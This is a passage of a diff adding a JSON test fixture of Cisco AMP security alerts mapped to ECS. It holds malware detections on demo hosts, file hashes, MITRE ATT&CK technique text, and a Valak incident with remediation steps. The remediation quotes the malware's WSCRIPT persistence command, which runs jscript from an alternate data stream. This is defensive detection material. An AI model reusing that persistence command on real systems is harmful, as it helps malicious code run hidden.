href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "87:c2:d9:a2:8c:74",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "threat_hunting": {
+                        "severity": "critical",
+                        "incident_title": "Valak Variant",
+                        "incident_id": 416,
+                        "incident_end_time": "2020-06-18T11:12:50.000Z",
+                        "techniques": [
+                            {
+                                "mitre_name": "technique",
+                                "tactics_names": "Collection",
+                                "system_requirements": "Privileges to access certain files and directories",
+                                "permissions": "",
+                                "name": "Data from Local System",
+                                "description": "\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\n\n\u003cp\u003eAdversaries may do this using a \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\"https://attack.mitre.org/software/S0106\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\"https://attack.mitre.org/techniques/T1119\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\n",
+                                "external_id": "T1005",
+                                "mitre_url": "https://attack.mitre.org/techniques/T1005",
+                                "data_sources": "File monitoring, Process monitoring, Process command-line parameters",
+                                "platforms": "Linux, macOS, Windows"
+                            },
+                            {
+                                "mitre_name": "technique",
+                                "tactics_names": "Execution, Persistence, Privilege Escalation",
+                                "permissions": "Administrator, SYSTEM, User",
+                                "name": "Scheduled Task/Job",
+                                "description": "\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\n",
+                                "external_id": "T1053",
+                                "mitre_url": "https://attack.mitre.org/techniques/T1053",
+                                "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs",
+                                "platforms": "Windows, Linux, macOS"
+                            },
+                            {
+                                "mitre_name": "technique",
+                                "tactics_names": "Defense Evasion, Execution",
+                                "permissions": "User",
+                                "name": "Scripting",
+                                "description": "\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\"https://attack.mitre.org/techniques/T1086\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\n\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\"https://attack.mitre.org/techniques/T1193\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\"https://attack.mitre.org/techniques/T1203\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\n\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\n",
+                                "external_id": "T1064",
+                                "mitre_url": "https://attack.mitre.org/techniques/T1064",
+                                "data_sources": "Process monitoring, File monitoring, Process command-line parameters",
+                                "platforms": "Linux, macOS, Windows"
+                            }
+                        ],
+                        "incident_start_time": "2021-01-15T10:48:08.000Z",
+                        "tactics": [
+                            {
+                                "name": "Defense Evasion",
+                                "description": "\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\n\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\n",
+                                "mitre_name": "tactic",
+                                "external_id": "TA0005",
+                                "mitre_url": "https://attack.mitre.org/tactics/TA0005"
+                            }
+                        ],
+                        "incident_summary": "The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.",
+                        "incident_remediation": "We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.",
+                        "incident_report_guid": "6e5292d5-248c-49dc-839d-201bcba64562",
+                        "incident_hunt_guid": "4bdbaf20-020f-4bb5-9da9-585da0e07817"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "87:c2:d9:a2:8c:74"
+                        ]
+                    },
+                    "techniques": [
+                        {
+                            "mitre_name": "technique",
+                            "tactics_names": "Collection",
+                            "system_requirements": "Privileges to access certain files and directories",
+                            "permissions": "",
+                            "name": "Data from Local System",
+                            "description": "\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\n\n\u003cp\u003eAdversaries may do this using a \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\"https://attack.mitre.org/software/S0106\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\"https://attack.mitre.org/techniques/T1119\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\n",
+                            "external_id": "T1005",
+                            "mitre_url": "https://attack.mitre.org/techniques/T1005",
+                            "data_sources": "File monitoring, Process monitoring, Process command-line parameters",
+                            "platforms": "Linux, macOS, Windows"
+                        },
+                        {
+                            "mitre_name": "technique",
+                            "tactics_names": "Execution, Persistence, Privilege Escalation",
+                            "permissions": "Administrator, SYSTEM, User",
+                            "name": "Scheduled Task/Job",
+                            "description": "\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\n",
+                            "external_id": "T1053",
+                            "mitre_url": "https://attack.mitre.org/techniques/T1053",
+                            "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs",
+                            "platforms": "Windows, Linux, macOS"
+                        },
+                        {
+                            "mitre_name": "technique",
+                            "tactics_names": "Defense Evasion, Execution",
+                            "permissions": "User",
+                            "name": "Scripting",
+                            "description": "\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\"https://attack.mitre.org/techniques/T1086\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\n\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\"https://attack.mitre.org/techniques/T1193\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\"https://attack.mitre.org/techniques/T1203\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\n\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\n",
+                            "external_id": "T1064",
+                            "mitre_url": "https://attack.mitre.org/techniques/T1064",
+                            "data_sources": "Process monitoring, File monitoring, Process command-line parameters",
+                            "platforms": "Linux, macOS, Windows"
+                        }
+                    ],
+                    "tactics": [
+                        {
+                            "name": "Defense Evasion",
+                            "description": "\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\n\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\n",
+                            "mitre_name": "tactic",
+                            "external_id": "TA0005",
+                            "mitre_url": "https://attack.mitre.org/tactics/TA0005"
+                        }
+                    ],
+                    "event_type_id": 1107296344
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 4040,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "@timestamp": "2021-01-15T11:20:38.000Z",
+            "file": {
+                "name": "wsymqyv90.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
+                "hash": {
+                    "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
+                    "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
+                    "md5": "e2f5dcd966e26d54329e8d79c7201652"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "hash": [
+                    "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
+                    "e2f5dcd966e26d54329e8d79c7201652",
+                    "70aef829bec17195e6c8ec0e6cba0ed39f97ba48"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "hostname": "Demo_Upatre",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469616802Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6180352115244794000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.GenericKD:ZVETJ.18gs.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180352115244793858",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 4040,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "@timestamp": "2021-01-15T11:20:06.000Z",
+            "file": {
+                "name": "wsymqyv90.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
+                "hash": {
+                    "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
+                    "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
+                    "md5": "e2f5dcd966e26d54329e8d79c7201652"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "hash": [
+                    "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
+                    "e2f5dcd966e26d54329e8d79c7201652",
+                    "70aef829bec17195e6c8ec0e6cba0ed39f97ba48"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "hostname": "Demo_Upatre",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469618886Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6180351977805840000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.GenericKD:ZVETJ.18gs.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180351977805840385",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:45:07.000Z",
+            "file": {
+                "name": "iodnxvg.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469620841Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159258594551267000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159258594551267599",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 3136,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "destination": {
+                "geo": {
+                    "continent_name": "North America",
+                    "country_name": "United States",
+                    "location": {
+                        "lon": -97.822,
+                        "lat": 37.751
+                    },
+                    "country_iso_code": "US"
+                },
+                "as": {
+                    "number": 15169,
+                    "organization": {
+                        "name": "Google LLC"
+                    }
+                },
+                "port": 443,
+                "ip": "8.8.4.4"
+            },
+            "source": {
+                "port": 55810,
+                "ip": "10.10.0.0"
+            },
+            "tags": [
+                "preserve_original_event"
+            ],
+            "network": {
+                "transport": "TCP",
+                "direction": "egress"
+            },
+            "@timestamp": "2021-01-15T10:37:43.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Upatre"
+                ],
+                "ip": [
+                    "10.10.0.0",
+                    "8.8.4.4",
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Upatre",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_Upatre"
+            },
+            "event": {
+                "severity": 3,
+                "action": "DFC Threat Detected",
+                "ingested": "2021-09-12T17:31:04.469622790Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "id": "6180341055704007000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "DFC.CustomIPList",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "e1:e5:94:ea:a5:44",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "e1:e5:94:ea:a5:44"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6180341055704006662",
+                    "event_type_id": 1090519084,
+                    "network_info": {
+                        "nfm": {
+                            "direction": "Outgoing connection from"
+                        },
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        }
+                    }
+                }
+            }
+        },
+        {
+            "process": {
+                "name": "iexplore.exe",
+                "pid": 3136,
+                "hash": {
+                    "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
+                    "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
+                    "md5": "b3581f426dc500a51091cdd5bacf0454"
+                }
+            },
+            "destination": {
+                "geo": {
+                    "continent_name": "North America",
+                    "country_name": "United States",
